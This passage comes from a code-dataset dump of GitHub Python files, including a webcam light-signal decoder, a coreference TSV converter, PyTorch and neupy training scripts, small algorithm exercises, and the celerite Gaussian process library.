arr2))\n","repo_name":"Jarry-Ha/TIL_github","sub_path":"0_algorithm/programmers/비밀지도.py","file_name":"비밀지도.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42592011191","text":"import datetime\nfrom decode import ROW_NUM\nimport imutils\nfrom threading import Thread\nimport threading\nimport cv2\nimport time\nimport numpy as np\n\n\ndef capture(frames, lock):\n stream = cv2.VideoCapture(0)\n cnt = 0\n while cnt < 990:\n (grabbed, frame) = stream.read()\n with lock:\n frames.append(frame)\n #cv2.imshow(\"Frame\", frame)\n #key = cv2.waitKey(1) & 0xFF\n if cnt == 0:\n cv2.imwrite(\"initial.png\", frame)\n cnt += 1\n # cv2.destroyAllWindows()\n\n\ndef Process(chunks):\n if len(chunks) >= 900:\n print(chunks[0].shape)\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter('output.mp4', fourcc, 30.0, (1280, 720))\n for i in chunks:\n out.write(i)\n out.release()\n exit()\n\ndef get_difference(previous_frame, current_frame):\n previous_frame = previous_frame.astype(np.int32)\n current_frame = current_frame.astype(np.int32)\n\n d_pixel = np.sum(np.abs(previous_frame - current_frame))/(previous_frame.shape[0]*previous_frame.shape[1])\n old_bins = np.zeros(766)\n new_bins = np.zeros(766)\n for i in range(previous_frame.shape[0]): # height\n for j in range(previous_frame.shape[1]): # width\n old_bins[np.sum(previous_frame[i, j, :])] += 1\n new_bins[np.sum(current_frame[i, j, :])] += 1\n d_histo = np.nansum(np.power((old_bins - new_bins), 2)/np.maximum(old_bins, new_bins))\n\n return d_pixel, d_histo\n\n\ndef decode(chunks, c_lock):\n chunks_ind = 0\n currentFrame = None\n nextFrame = None\n # constant for determining scene type\n d_pixel_cut = 100\n d_pixel_static = 10\n d_histo_cut = 1\n d_histo_static = 0.1\n while True:\n enough_frame = False\n with c_lock:\n if len(chunks)-chunks_ind > 12:\n currentFrameWindow = chunks[chunks_ind:chunks_ind+6]\n nextFrameWindow = chunks[chunks_ind+6:chunks_ind+12]\n enough_frame = True\n chunks_ind += 6\n if enough_frame:\n # read current and next window (total of 12 frames)\n # currentFrameWindow = read_window()\n # nextFrameWindow = read_window(vidcap)\n currentSampleFrame = currentFrameWindow[0]\n nextSampleFrame = nextFrameWindow[0]\n\n height = currentSampleFrame.shape[0]\n width = currentSampleFrame.shape[1]\n\n # resized_current_image = resize_image(currentSampleFrame)\n # resized_next_image = resize_image(nextSampleFrame)\n\n # get difference\n resized_current_frame = cv2.resize(currentSampleFrame, (int(width/4), int(height/4)))\n resized_next_frame = cv2.resize(nextSampleFrame, (int(width/4), int(height/4)))\n d_pixel, d_histo = get_difference(resized_current_frame, resized_next_frame)\n\n # determine frame scene\n if d_pixel > d_pixel_cut and d_histo > d_histo_cut: # cut scene\n return\n # frameScene = cut\n # currentSampleFrame = nextSampleFrame # assign the new frame to previous frame for next window\n # currentFrameWindow = nextFrameWindow # assign the next window to current window\n # continue\n # elif d_pixel < d_pixel_static and d_histo < d_histo_static: # static scene\n # frameScene = static\n # else:\n # frameScene = gradual\n\n # sum RGB\n currentFrameWindow = np.sum(currentFrameWindow, axis=3)\n\n # display pixel value\n # fprintf(\"--------------------\\npixel value on %d th frame\\n\", i-6)\n # fprintf(\"%d %d %d %d %d %d\\n\", currentFrameWindow(360, 640, 1), currentFrameWindow(360, 640, 2), currentFrameWindow(360, 640, 3), currentFrameWindow(360, 640, 4), currentFrameWindow(360, 640, 5), currentFrameWindow(360, 640, 6))\n\n # cut into grids\n ROW_NUM = 1\n COL_NUM = 1\n row_num = ROW_NUM\n col_num = COL_NUM\n for j in range(row_num):\n for k in range(col_num):\n center_height = int((j+0.5)*height/row_num)\n center_width = int((k+0.5)*width/col_num)\n\n # pixelIntensity = (squeeze(currentFrameWindow(centerHeight, centerWidth, : ))).'\n pixel_intensity = currentFrameWindow[:, center_height, center_width]\n alpha_value = 1 - pixel_intensity/pixel_intensity[1]\n\n # extended_alpha = np.tile(alphaValue, 5)\n demodulation = np.fft.fft(alpha_value, 30)\n # Pyy = demodulation * np.conjugate(demodulation) / 30 # normalization\n Pyy = abs(demodulation) / 30\n\n # freq = np.arange(0, 15)*60/30\n # plt.plot(freq, Pyy[:15])\n # plt.show()\n\n if Pyy[11] > Pyy[16]:\n print(\"0\")\n # output_value.append(0)\n else:\n print(\"1\")\n # output_value.append(1)\n\n # print(len(chunks))\n\n\ndef main():\n frames = []\n frames_ind = 0\n fps = 30\n second = None\n chunks = []\n chunk_len = 6\n lock = threading.Lock()\n c_lock = threading.Lock()\n thread1 = threading.Thread(target=capture, args=(frames, lock))\n thread1.start()\n thread2 = threading.Thread(target=capture, args=(frames, lock))\n thread2.start()\n thread3 = threading.Thread(target=decode, args=(chunks, c_lock))\n thread3.start()\n # capture(frames)\n time.sleep(1)\n with lock:\n frames_ind = len(frames)\n start_time = time.time()\n try:\n while True:\n if time.time() - start_time >= 1:\n start_time = time.time()\n with lock:\n second = frames[frames_ind:]\n frames_ind = len(frames)\n second = [second[int(i*len(second) / fps)] for i in range(fps)]\n chunks.extend(second)\n print(len(chunks))\n # Process(chunks)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ching-Chu-Lin/WNFA-final","sub_path":"src/capture (1).py","file_name":"capture (1).py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72322870547","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n author: Noémi Vadász\n last update: 2019/12/02\n\n\"\"\"\n\nimport sys\n\n# google tablazat mezok\n# 0: TOKEN ID\n# 1: FORM\n# 2: LEMMA\n# 3: UPOS\n# 4: UPOS\n# 5: FEATS\n# 6: HEAD\n# 7: DEPREL\n# 8: DEPS\n# 9: REFREL\n# 10: REFTYPE\n# 11: javított szóalak\n# 12: javított tő\n# 13: javított szófaj\n# 14: javított morfológia\n# 15: tokenizálási hiba\n# 16: függőségi hiba\n\n\nxtsv_fields = {'TOKEN ID': 'id',\n 'FORM': 'form',\n 'LEMMA': 'lemma',\n 'UPOS': 'upos',\n 'FEATS': 'feats',\n 'HEAD': 'head',\n 'DEPREL': 'deprel',\n 'REFREL': 'corefhead',\n 'REFTYPE': 'coreftype'\n }\n\n\ndef read_lines():\n\n header = sys.stdin.readline().strip().split('\\t')\n\n lines = list()\n\n for line in sys.stdin:\n\n if not line.startswith('#'):\n stripline = line.strip().split('\\t')\n if len(stripline) > 1:\n fields = dict()\n for field in header:\n if len(stripline) > header.index(field):\n fields[field] = stripline[header.index(field)]\n else:\n fields[field] = '_'\n\n lines.append(fields)\n else:\n lines.append('')\n\n return header, lines\n\n\ndef do_commands(lines):\n\n for line in lines:\n if isinstance(line, dict):\n if line['javított szóalak'] != '_':\n line['FORM'] = line['javított szóalak']\n if line['javított tő'] != '_':\n line['LEMMA'] = line['javított tő']\n if line['javított szófaj'] != '_':\n line['UPOS'] = line['javított szófaj']\n if line['javított morfológia'] != '_':\n line['FEATS'] = line['javított morfológia']\n\n\ndef order_fields(lines):\n\n xlines = list()\n\n for line in lines:\n if isinstance(line, dict):\n fields = dict()\n for field in line:\n if field in xtsv_fields:\n fields[xtsv_fields[field]] = line[field]\n\n for value in xtsv_fields.values():\n if value not in fields:\n fields[value] = '_'\n xlines.append(fields)\n\n else:\n xlines.append('')\n\n xheader = xlines[0].keys()\n\n return xheader, xlines\n\n\ndef print_xtsv(header, lines):\n\n print('\\t'.join(header))\n for line in lines:\n if isinstance(line, dict):\n\n print('\\t'.join(val for val in line.values()))\n else:\n print(line)\n\n\ndef main():\n\n header, lines = read_lines()\n do_commands(lines)\n xheader, xlines = order_fields(lines)\n print_xtsv(xheader, xlines)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vadno/korkor_pilot","sub_path":"scripts/coref_postproc.py","file_name":"coref_postproc.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"12370022650","text":"import torch\nfrom concat_dataset import ConcatDataset\nfrom torch.utils.data.dataloader import DataLoader\n\nclass Train:\n def __init__(self, config, preProcessedData, collate_fn):\n super().__init__()\n\n self.batch_size = config[\"batch_size\"]\n self.epochs = config[\"epoch\"]\n self.early_stop = config[\"early_stop\"]\n\n # define train test split\n train_qty = int(0.9 * len(preProcessedData.labels))\n validation_qty = len(preProcessedData.labels) - train_qty\n\n torch.manual_seed(0)\n\n labelled_data = [[s, l] for s,l in zip(preProcessedData.sentence_representation, preProcessedData.label_representation)]\n train_data, validation_data = torch.utils.data.random_split(labelled_data, [train_qty, validation_qty])\n\n self.x_train, self.y_train = [], []\n\n for train_dp in train_data:\n self.x_train.append(train_dp[0])\n self.y_train.append(train_dp[1])\n\n self.x_validation, self.y_validation = [], []\n\n for val_dp in validation_data:\n self.x_validation.append(val_dp[0])\n self.y_validation.append(val_dp[1])\n\n # initialise dataloaders\n self.concat_train = ConcatDataset((self.x_train, self.y_train))\n self.dataloader_train = DataLoader(self.concat_train, batch_size=self.batch_size, collate_fn=collate_fn)\n self.concat_validation = ConcatDataset((self.x_validation, self.y_validation))\n self.dataloader_validation = DataLoader(self.concat_validation, batch_size=self.batch_size, collate_fn=collate_fn)\n\n def doTraining(self, model, model_name, loss_fxn, optimizer, accuracy_fxn):\n model.train()\n early_stop, best_accuracy = 0, 0\n\n for epoch in range(self.epochs):\n batch_count = 1\n\n for data, label, length in self.dataloader_train:\n optimizer.zero_grad()\n y_pred = model(data, length)\n loss = loss_fxn(y_pred, torch.tensor(label))\n batch_count += 1\n loss.backward()\n optimizer.step()\n\n accuracy, _, _ = accuracy_fxn(model, self.dataloader_validation)\n\n if accuracy > best_accuracy:\n best_accuracy = accuracy\n early_stop = 0\n torch.save(model, f\"data/{model_name}.model\")\n print(f\"epoch: {epoch + 1}\\tbatch: {batch_count}\\taccuracy: {best_accuracy}\")\n else:\n early_stop += 1\n if early_stop >= self.early_stop:\n print(\"early stop condition met\")\n break\n final_model = torch.load(f\"data/{model_name}.model\")\n accuracy, y_actual, y_pred = accuracy_fxn(final_model, self.dataloader_validation)\n return accuracy, y_pred","repo_name":"AgreshB/Text-Mining-Classification","sub_path":"bilstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1729143863","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom neupy import algorithms, layers, environment\n\n\ndef rmsle(expected, predicted):\n log_expected = np.log1p(expected + 1)\n log_predicted = np.log1p(predicted + 1)\n squared_log_error = np.square(log_expected - log_predicted)\n return np.sqrt(np.mean(squared_log_error))\n\n\nenvironment.reproducible()\nplt.style.use('ggplot')\n\ndataset = datasets.load_boston()\ndata = dataset.data\ntarget = dataset.target.reshape((-1, 1))\n\ndata_scaler = preprocessing.MinMaxScaler((-3, 3))\ntarget_scaler = preprocessing.MinMaxScaler()\n\ndata = data_scaler.fit_transform(data)\ntarget = target_scaler.fit_transform(target)\n\nx_train, x_test, y_train, y_test = train_test_split(\n data, target, test_size=0.15\n)\n\ncgnet = algorithms.Hessian(\n connection=[\n layers.Input(13),\n layers.Sigmoid(50),\n layers.Sigmoid(10),\n layers.Sigmoid(1),\n ],\n verbose=True,\n)\n\ncgnet.train(x_train, y_train, x_test, y_test, epochs=3)\ny_predict = cgnet.predict(x_test)\n\ny_test = target_scaler.inverse_transform(y_test.reshape((-1, 1)))\ny_predict = target_scaler.inverse_transform(y_predict).T.round(1)\nerror = rmsle(y_predict, y_test)\nprint(\"RMSLE = {}\".format(error))\n","repo_name":"Alvinhaidar/neupy","sub_path":"examples/mlp/boston_price_prediction.py","file_name":"boston_price_prediction.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19386634793","text":"import boto3\n\ndef uploadtos3():\n s3 = boto3.client(\"s3\")\n \n bucket = \"realestatedata123\"\n filename = \"data.txt\"\n mapfilename = \"map.html\"\n\n s3.upload_file(\"./data.txt\", bucket, filename, ExtraArgs={'ContentType': 'text/plain'})\n s3.upload_file(\"./map.html\", bucket, mapfilename, ExtraArgs={'ContentType': 'text/html'}) ","repo_name":"natachikhinashvili/real-estate","sub_path":"uploadtos3.py","file_name":"uploadtos3.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33151625656","text":"t = int(input())\n\nfor i in range(t):\n \n data = input()\n lst = [data[0]]\n if data[0] == \")\":\n print(\"NO\")\n continue\n\n for j in data[1:]:\n if j == \"(\":\n lst.append(j)\n else:\n if not lst:\n lst.append(j)\n break\n elif lst[-1] == \"(\":\n lst.pop()\n if not lst:\n print(\"YES\")\n else:\n print(\"NO\")\n\n","repo_name":"HeoYou/algorithm-python","sub_path":"Q9012 괄호.py","file_name":"Q9012 괄호.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43202477094","text":"# -*- coding:utf-8 -*-\n# @Author:Cheng Lei 1037654919@qq.com\n# @Time : 2022/6/6 下午5:22\n# @FileName: test_ triangles.py\n# @Software: PyCharm\n\n#杨辉三角 write by cl\ndef triangles(max):\n n=0\n lll=[]\n while n<=max:\n ll=[1 for i in range(n+1)]\n for i in range(n+1):\n if i ==0 or i==n:\n ll[i]=1\n else:\n ll[i]=lll[i-1]+lll[i]\n n+=1\n lll=ll\n yield ll\n#大神的\ndef triangles2():\n L = [1]\n while True:\n yield L\n L = [1] + [L[n] + L[n + 1] for n in range(len(L) - 1)] + [1]\n\nn=0\nresults = []\nfor t in triangles2():\n results.append(t)\n n = n + 1\n if n == 10:\n break\n\nfor t in results:\n print(t)\n\n","repo_name":"beihai-xiaoshi/test","sub_path":"test_ triangles.py","file_name":"test_ triangles.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20725135833","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function\nimport math\nimport warnings\nimport numpy as np\n\nfrom . import solver, terms\nfrom .modeling import ModelSet, ConstantModel\n\n__all__ = [\"GP\"]\n\n\nclass GP(ModelSet):\n \"\"\"The main interface to the celerite Gaussian Process solver\n\n Args:\n kernel: An instance of a subclass of :class:`terms.Term`.\n mean (Optional): A simple mean value for the process. This can either\n be a ``float`` or a subclass of :class:`modeling.Model`.\n (default: ``0.0``)\n fit_mean (optional): If ``False``, all of the parameters of ``mean``\n will be frozen. Otherwise, the parameter states are unaffected.\n (default: ``False``)\n\n \"\"\"\n\n def __init__(\n self,\n kernel,\n mean=0.0,\n fit_mean=False,\n log_white_noise=None,\n fit_white_noise=False,\n ):\n self._solver = None\n self._computed = False\n self._t = None\n self._y_var = None\n\n # Backwards compatibility for 'log_white_noise' parameter\n if log_white_noise is not None:\n warnings.warn(\n \"The 'log_white_noise' parameter is deprecated. \"\n \"Use a 'JitterTerm' instead.\"\n )\n k = terms.JitterTerm(log_sigma=float(log_white_noise))\n if not fit_white_noise:\n k.freeze_parameter(\"log_sigma\")\n kernel += k\n\n # Build up a list of models for the ModelSet\n models = [(\"kernel\", kernel)]\n\n # And the mean model\n try:\n float(mean)\n except TypeError:\n pass\n else:\n mean = ConstantModel(float(mean))\n\n if not fit_mean:\n for k in mean.get_parameter_names():\n mean.freeze_parameter(k)\n models += [(\"mean\", mean)]\n\n # Init the superclass\n super(GP, self).__init__(models)\n\n @property\n def solver(self):\n if self._solver is None:\n self._solver = solver.CholeskySolver()\n return self._solver\n\n @property\n def mean(self):\n \"\"\"The mean :class:`modeling.Model`\"\"\"\n return self.models[\"mean\"]\n\n @property\n def kernel(self):\n return self.models[\"kernel\"]\n\n @property\n def dirty(self):\n return super(GP, self).dirty or not self._computed\n\n @dirty.setter\n def dirty(self, value):\n self._computed = not value\n super(GP, self.__class__).dirty.fset(self, value)\n\n @property\n def computed(self):\n return (\n self._solver is not None\n and self.solver.computed()\n and not self.dirty\n )\n\n def compute(\n self, t, yerr=1.123e-12, check_sorted=True, A=None, U=None, V=None\n ):\n \"\"\"\n Compute the extended form of the covariance matrix and factorize\n\n Args:\n x (array[n]): The independent coordinates of the data points.\n This array must be _sorted_ in ascending order.\n yerr (Optional[float or array[n]]): The measurement uncertainties\n for the data points at coordinates ``x``. These values will be\n added in quadrature to the diagonal of the covariance matrix.\n (default: ``1.123e-12``)\n check_sorted (bool): If ``True``, ``x`` will be checked to make\n sure that it is properly sorted. If ``False``, the coordinates\n will be assumed to be in the correct order.\n\n Raises:\n ValueError: For un-sorted data or mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n t = np.atleast_1d(t)\n if check_sorted and np.any(np.diff(t) < 0.0):\n raise ValueError(\"the input coordinates must be sorted\")\n if check_sorted and len(t.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n self._t = t\n self._yerr = np.empty_like(self._t)\n self._yerr[:] = yerr\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = self.kernel.coefficients\n self._A = np.empty(0) if A is None else A\n self._U = np.empty((0, 0)) if U is None else U\n self._V = np.empty((0, 0)) if V is None else V\n self.solver.compute(\n self.kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n self._A,\n self._U,\n self._V,\n t,\n self._yerr ** 2,\n )\n self.dirty = False\n\n def _recompute(self):\n if not self.computed:\n if self._t is None:\n raise RuntimeError(\"you must call 'compute' first\")\n self.compute(\n self._t,\n self._yerr,\n check_sorted=False,\n A=self._A,\n U=self._U,\n V=self._V,\n )\n\n def _process_input(self, y):\n if self._t is None:\n raise RuntimeError(\"you must call 'compute' first\")\n if len(self._t) != len(y):\n raise ValueError(\"dimension mismatch\")\n return np.ascontiguousarray(y, dtype=float)\n\n def log_likelihood(self, y, _const=math.log(2.0 * math.pi), quiet=False):\n \"\"\"\n Compute the marginalized likelihood of the GP model\n\n The factorized matrix from the previous call to :func:`GP.compute` is\n used so ``compute`` must be called first.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n quiet (bool): If true, return ``-numpy.inf`` for non-positive\n definite matrices instead of throwing an error.\n\n Returns:\n float: The marginalized likelihood of the GP model.\n\n Raises:\n ValueError: For mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n y = self._process_input(y)\n resid = y - self.mean.get_value(self._t)\n try:\n self._recompute()\n except solver.LinAlgError:\n if quiet:\n return -np.inf\n raise\n if len(y.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n logdet = self.solver.log_determinant()\n if not np.isfinite(logdet):\n return -np.inf\n loglike = -0.5 * (\n self.solver.dot_solve(resid) + logdet + len(y) * _const\n )\n if not np.isfinite(loglike):\n return -np.inf\n return loglike\n\n def grad_log_likelihood(self, y, quiet=False):\n \"\"\"\n Compute the gradient of the marginalized likelihood\n\n The factorized matrix from the previous call to :func:`GP.compute` is\n used so ``compute`` must be called first. The gradient is taken with\n respect to the parameters returned by :func:`GP.get_parameter_vector`.\n This function requires the `autograd\n `_ package.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n quiet (bool): If true, return ``-numpy.inf`` and a gradient vector\n of zeros for non-positive definite matrices instead of\n throwing an error.\n\n Returns:\n The gradient of marginalized likelihood with respect to the\n parameter vector.\n\n Raises:\n ValueError: For mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n if not solver.has_autodiff():\n raise RuntimeError(\n \"celerite must be compiled with autodiff \"\n \"support to use the gradient methods\"\n )\n\n if not self.kernel.vector_size:\n return self.log_likelihood(y, quiet=quiet), np.empty(0)\n\n y = self._process_input(y)\n if len(y.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n resid = y - self.mean.get_value(self._t)\n\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = self.kernel.coefficients\n try:\n val, grad = self.solver.grad_log_likelihood(\n self.kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n self._A,\n self._U,\n self._V,\n self._t,\n resid,\n self._yerr ** 2,\n )\n except solver.LinAlgError:\n if quiet:\n return -np.inf, np.zeros(self.vector_size)\n raise\n\n if self.kernel._has_coeffs:\n coeffs_jac = self.kernel.get_coeffs_jacobian()\n full_grad = np.dot(coeffs_jac, grad[1:])\n else:\n full_grad = np.zeros(self.kernel.vector_size)\n if self.kernel._has_jitter:\n jitter_jac = self.kernel.get_jitter_jacobian()\n full_grad += jitter_jac * grad[0]\n\n if self.mean.vector_size:\n self._recompute()\n alpha = self.solver.solve(resid)\n g = self.mean.get_gradient(self._t)\n full_grad = np.append(full_grad, np.dot(g, alpha))\n\n return val, full_grad\n\n def apply_inverse(self, y):\n \"\"\"\n Apply the inverse of the covariance matrix to a vector or matrix\n\n Solve ``K.x = y`` for ``x`` where ``K`` is the covariance matrix of\n the GP with the white noise and ``yerr`` components included on the\n diagonal.\n\n Args:\n y (array[n] or array[n, nrhs]): The vector or matrix ``y``\n described above.\n\n Returns:\n array[n] or array[n, nrhs]: The solution to the linear system.\n This will have the same shape as ``y``.\n\n Raises:\n ValueError: For mismatched dimensions.\n\n \"\"\"\n self._recompute()\n return self.solver.solve(self._process_input(y))\n\n def dot(\n self, y, t=None, A=None, U=None, V=None, kernel=None, check_sorted=True\n ):\n \"\"\"\n Dot the covariance matrix into a vector or matrix\n\n Compute ``K.y`` where ``K`` is the covariance matrix of the GP without\n the white noise or ``yerr`` values on the diagonal.\n\n Args:\n y (array[n] or array[n, nrhs]): The vector or matrix ``y``\n described above.\n kernel (Optional[terms.Term]): A different kernel can optionally\n be provided to compute the matrix ``K`` from a different\n kernel than the ``kernel`` property on this object.\n\n Returns:\n array[n] or array[n, nrhs]: The dot product ``K.y`` as described\n above. This will have the same shape as ``y``.\n\n Raises:\n ValueError: For mismatched dimensions.\n\n \"\"\"\n if kernel is None:\n kernel = self.kernel\n\n if t is not None:\n t = np.atleast_1d(t)\n if check_sorted and np.any(np.diff(t) < 0.0):\n raise ValueError(\"the input coordinates must be sorted\")\n if check_sorted and len(t.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n\n A = np.empty(0) if A is None else A\n U = np.empty((0, 0)) if U is None else U\n V = np.empty((0, 0)) if V is None else V\n else:\n if not self.computed:\n raise RuntimeError(\"you must call 'compute' first\")\n t = self._t\n A = self._A\n U = self._U\n V = self._V\n\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = kernel.coefficients\n\n return self.solver.dot(\n kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n A,\n U,\n V,\n t,\n np.ascontiguousarray(y, dtype=float),\n )\n\n def predict(self, y, t=None, return_cov=True, return_var=False):\n \"\"\"\n Compute the conditional predictive distribution of the model\n\n You must call :func:`GP.compute` before this method.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n t (Optional[array[ntest]]): The independent coordinates where the\n prediction should be made. If this is omitted the coordinates\n will be assumed to be ``x`` from :func:`GP.compute` and an\n efficient method will be used to compute the prediction.\n return_cov (Optional[bool]): If ``True``, the full covariance\n matrix is computed and returned. Otherwise, only the mean\n prediction is computed. (default: ``True``)\n return_var (Optional[bool]): If ``True``, only return the diagonal\n of the predictive covariance; this will be faster to compute\n than the full covariance matrix. This overrides ``return_cov``\n so, if both are set to ``True``, only the diagonal is computed.\n (default: ``False``)\n\n Returns:\n ``mu``, ``(mu, cov)``, or ``(mu, var)`` depending on the values of\n ``return_cov`` and ``return_var``. These output values are:\n (a) **mu** ``(ntest,)``: mean of the predictive distribution,\n (b) **cov** ``(ntest, ntest)``: the predictive covariance matrix,\n and\n (c) **var** ``(ntest,)``: the diagonal elements of ``cov``.\n\n Raises:\n ValueError: For mismatched dimensions.\n\n \"\"\"\n y = self._process_input(y)\n if len(y.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n\n if t is None:\n xs = self._t\n else:\n xs = np.ascontiguousarray(t, dtype=float)\n if len(xs.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n\n # Make sure that the model is computed\n self._recompute()\n\n # Compute the predictive mean.\n resid = y - self.mean.get_value(self._t)\n\n if t is None:\n alpha = self.solver.solve(resid).flatten()\n alpha = resid - (self._yerr ** 2 + self.kernel.jitter) * alpha\n elif not len(self._A):\n alpha = self.solver.predict(resid, xs)\n else:\n Kxs = self.get_matrix(xs, self._t)\n alpha = np.dot(Kxs, alpha)\n\n mu = self.mean.get_value(xs) + alpha\n if not (return_var or return_cov):\n return mu\n\n # Predictive variance.\n Kxs = self.get_matrix(xs, self._t)\n KxsT = np.ascontiguousarray(Kxs.T, dtype=np.float64)\n if return_var:\n var = -np.sum(KxsT * self.apply_inverse(KxsT), axis=0)\n var += self.kernel.get_value(0.0)\n return mu, var\n\n # Predictive covariance\n cov = self.kernel.get_value(xs[:, None] - xs[None, :])\n cov -= np.dot(Kxs, self.apply_inverse(KxsT))\n return mu, cov\n\n def get_matrix(\n self, x1=None, x2=None, include_diagonal=None, include_general=None\n ):\n \"\"\"\n Get the covariance matrix at given independent coordinates\n\n Args:\n x1 (Optional[array[n1]]): The first set of independent coordinates.\n If this is omitted, ``x1`` will be assumed to be equal to ``x``\n from a previous call to :func:`GP.compute`.\n x2 (Optional[array[n2]]): The second set of independent\n coordinates. If this is omitted, ``x2`` will be assumed to be\n ``x1``.\n include_diagonal (Optional[bool]): Should the white noise and\n ``yerr`` terms be included on the diagonal?\n (default: ``False``)\n\n \"\"\"\n if x1 is None and x2 is None:\n if self._t is None or not self.computed:\n raise RuntimeError(\"you must call 'compute' first\")\n K = self.kernel.get_value(self._t[:, None] - self._t[None, :])\n if include_diagonal is None or include_diagonal:\n K[np.diag_indices_from(K)] += (\n self._yerr ** 2 + self.kernel.jitter\n )\n if (include_general is None or include_general) and len(self._A):\n K[np.diag_indices_from(K)] += self._A\n K += np.tril(np.dot(self._U.T, self._V), -1)\n K += np.triu(np.dot(self._V.T, self._U), 1)\n return K\n\n incl = False\n x1 = np.ascontiguousarray(x1, dtype=float)\n if x2 is None:\n x2 = x1\n incl = include_diagonal is not None and include_diagonal\n K = self.kernel.get_value(x1[:, None] - x2[None, :])\n if incl:\n K[np.diag_indices_from(K)] += self.kernel.jitter\n return K\n\n def sample(self, size=None):\n \"\"\"\n Sample from the prior distribution over datasets\n\n Args:\n size (Optional[int]): The number of samples to draw.\n\n Returns:\n array[n] or array[size, n]: The samples from the prior\n distribution over datasets.\n\n \"\"\"\n self._recompute()\n if size is None:\n n = np.random.randn(len(self._t))\n else:\n n = np.random.randn(len(self._t), size)\n n = self.solver.dot_L(n)\n if size is None:\n return self.mean.get_value(self._t) + n[:, 0]\n return self.mean.get_value(self._t)[None, :] + n.T\n\n def sample_conditional(self, y, t=None, size=None, regularize=None):\n \"\"\"\n Sample from the conditional (predictive) distribution\n\n Note: this method scales as ``O(M^3)`` for large ``M``, where\n ``M == len(t)``.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n t (Optional[array[ntest]]): The independent coordinates where the\n prediction should be made. If this is omitted the coordinates\n will be assumed to be ``x`` from :func:`GP.compute` and an\n efficient method will be used to compute the prediction.\n size (Optional[int]): The number of samples to draw.\n regularize (Optional[float]): For poorly conditioned systems, you\n can provide a small number here to regularize the predictive\n covariance. This number will be added to the diagonal.\n\n Returns:\n array[n] or array[size, n]: The samples from the conditional\n distribution over datasets.\n\n \"\"\"\n mu, cov = self.predict(y, t, return_cov=True)\n if regularize is not None:\n cov[np.diag_indices_from(cov)] += regularize\n return np.random.multivariate_normal(mu, cov, size=size)\n","repo_name":"dfm/celerite","sub_path":"celerite/celerite.py","file_name":"celerite.py","file_ext":"py","file_size_in_byte":19496,"program_lang":"python","lang":"en","doc_type":"code","stars":177,"dataset":"github-code","pt":"48"} +{"seq_id":"37465589418","text":"from unittest import TestCase as TC\nimport tempfile\nimport os\nimport shutil\n\nfrom structure_and_landscapes.organism.integer.organism \\\n import Organism as int_organism\nfrom structure_and_landscapes.population.population import Population\n\nimport run\nimport persistence\n\n\nclass TestRun(TC):\n def setUp(self):\n \"\"\"\n Generates a temp file path.\n \"\"\"\n temp_dir = tempfile.mkdtemp()\n filename = \"test.shelf\"\n filepath = os.path.join(temp_dir, filename)\n self.temp_file = filepath\n org_list = [int_organism(i) for i in range(1, 11)]\n self.init_pop = Population(org_list)\n\n def tearDown(self):\n \"\"\"\n Closes temp file.\n \"\"\"\n temp_dir = os.path.dirname(self.temp_file)\n shutil.rmtree(temp_dir)\n\n def test_run_simple(self):\n final_population = None\n other_data = \"hi\"\n r = run.Run(self.init_pop, final_population, {},\n self.temp_file, other_data)\n with persistence.get_shelf(self.temp_file) as shelf:\n r_saved = shelf.values()[0]\n self.assertEquals(r_saved.final_population, None)\n self.assertEquals(r_saved.other_data, \"hi\")\n\n def 